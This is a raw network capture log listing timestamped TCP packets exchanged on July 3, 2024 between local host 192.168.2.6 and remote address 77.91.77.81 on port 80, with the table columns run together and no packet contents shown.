                                                                Jul 3, 2024 08:38:37.220599890 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.220599890 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.220599890 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.220611095 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.220632076 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.221106052 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.221117020 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.221127033 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.221132040 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.221146107 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.221158028 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.221168041 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.221174955 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.221174955 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.221179962 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.221206903 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.221576929 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.221587896 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.221597910 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.221606970 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.221610069 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.221622944 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.221632957 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.221643925 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.221653938 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.221666098 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.221666098 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.221666098 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.222187996 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.222198963 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.222208023 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.222219944 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.222230911 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.222238064 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.222238064 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.222238064 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.222239971 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.222251892 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.222263098 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.222274065 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.222274065 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.222286940 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.222297907 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.222302914 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.222302914 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.222310066 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.222347975 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.222910881 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.222949028 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.222959995 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.222970963 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.222980976 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.222991943 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.223001957 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.223006964 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.223014116 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.223026991 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.223037958 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.223046064 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.223046064 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.223050117 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.223078012 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.223702908 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.223712921 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.223723888 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.223732948 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.223743916 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.223748922 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.223748922 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.223748922 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.223754883 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.223767042 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.223774910 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.223778963 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.223790884 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.223800898 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.223809958 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.223809958 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.223813057 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.223824978 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.223838091 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.223849058 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.223850012 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.223874092 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.223874092 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.224473953 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.224499941 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.224654913 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.224667072 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.224678040 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.224688053 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.224698067 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.224709034 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.224719048 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.224729061 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.224730968 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.224730968 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.224730968 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.224740028 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.224751949 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.224761009 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.224762917 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.224775076 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.224780083 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.224896908 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.224896908 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.225603104 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.225615025 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.225625038 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.225635052 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.225646019 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.225656033 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.225665092 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.225675106 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.225686073 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.225696087 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.225706100 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.225708008 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.225708008 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.225708008 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.225718021 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.225728989 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.225739002 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.225749969 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.225758076 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.225768089 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.225775003 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.225775003 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.225775003 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.225780964 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.225792885 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.225867033 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.226537943 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.226550102 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.226561069 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.226572037 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.226582050 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.226592064 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.226602077 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.226603985 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.226603985 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.226603985 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.226613998 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.226625919 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.226635933 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.226639986 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.226646900 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.226658106 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.226666927 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.226677895 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.226686954 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.226686954 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.226687908 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.226686954 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.226700068 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.226711035 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.226722002 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.226762056 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.226762056 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.226794004 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.226794004 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.227329016 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.227341890 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.227353096 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.227364063 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.227384090 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.227468014 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.227479935 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.227489948 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.227499962 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.227504015 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.227510929 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.227513075 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.227523088 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.227534056 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.227544069 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.227554083 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.227559090 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.227559090 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.227565050 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.227576017 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.227586985 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.227595091 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.227595091 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.227600098 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.227612972 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.227710962 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.227744102 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.228336096 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.228354931 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.228364944 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.228375912 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.228385925 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.228398085 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.228408098 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.228418112 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.228429079 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.228429079 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.228429079 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.228429079 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.228441000 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.228452921 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.228458881 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.228462934 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.228475094 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.228491068 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.228501081 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.228501081 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.228502989 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.228524923 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.228527069 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.228535891 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.228548050 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.228559017 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.228569031 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.228569031 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.228569031 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.228569031 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.228698969 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.228698969 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.229279995 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.229291916 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.229304075 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.229321003 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.229336023 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.229347944 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.229357958 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.229367971 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.229376078 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.229376078 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.229376078 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.229381084 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.229393005 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.229403973 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.229415894 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.229425907 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.229435921 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.229444981 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.229445934 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.229444981 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.229444981 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.229458094 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.229469061 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.229475021 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.229475021 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.229481936 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.229494095 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.229504108 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.229525089 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.229525089 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.229707003 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.230170012 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230180979 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230190992 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230201960 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230211973 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230222940 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230232954 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230243921 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230253935 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230263948 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230268002 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.230268002 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.230268002 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.230320930 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.230356932 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.230532885 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230545998 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230556965 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230667114 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230678082 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230688095 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230699062 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230704069 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.230704069 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.230704069 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.230710030 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230721951 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230736971 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.230737925 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230751038 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230762959 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230773926 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230783939 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230787039 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.230787039 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.230796099 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230806112 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.230806112 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230818033 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230829000 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230835915 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.230835915 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.230840921 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230851889 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.230890989 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.231173992 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.231638908 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.231651068 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.231661081 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.231678009 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.231688976 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.231699944 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.231710911 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.231723070 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.231733084 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.231733084 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.231733084 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.231744051 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.231755018 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.231765032 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.231772900 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.231775999 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.231787920 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.231797934 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.231807947 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.231808901 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.231820107 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.231826067 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.231826067 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.231832027 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.231843948 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.231856108 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.231867075 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.231867075 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.231894970 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.231894970 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.232031107 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.232546091 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.232558966 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.232569933 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.232580900 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.232589960 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.232600927 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.232610941 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.232611895 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.232621908 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.232633114 CEST804972577.91.77.81192.168.2.6
                                                                Jul 3, 2024 08:38:37.232645988 CEST4972580192.168.2.677.91.77.81
                                                                Jul 3, 2024 08:38:37.232646942 CEST804972577.91.77.81192.168.2.6
